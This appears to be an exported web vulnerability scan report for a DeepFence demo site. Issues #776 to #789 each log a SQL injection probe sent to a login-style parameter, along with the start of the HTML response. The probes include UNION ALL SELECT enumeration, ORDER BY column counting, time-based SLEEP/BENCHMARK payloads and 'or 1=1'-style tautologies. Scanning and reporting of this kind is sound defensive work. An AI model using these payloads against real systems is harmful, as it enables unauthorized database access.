href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #776\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+\nCHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+\nCHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+\nCHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113),NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #777\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/\nhead/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> \nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of\nZendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> <\n/script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link\nrel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWF\nnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoq\nIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints \non your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #778\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #779\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #780\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #781\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n--Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language\n=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\n\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-\naed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-\n- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSB\nJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgA\nQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #782\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #783\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #784\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR x=x--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #785\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #786\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #787\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or 'x'='x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #788\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #789\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 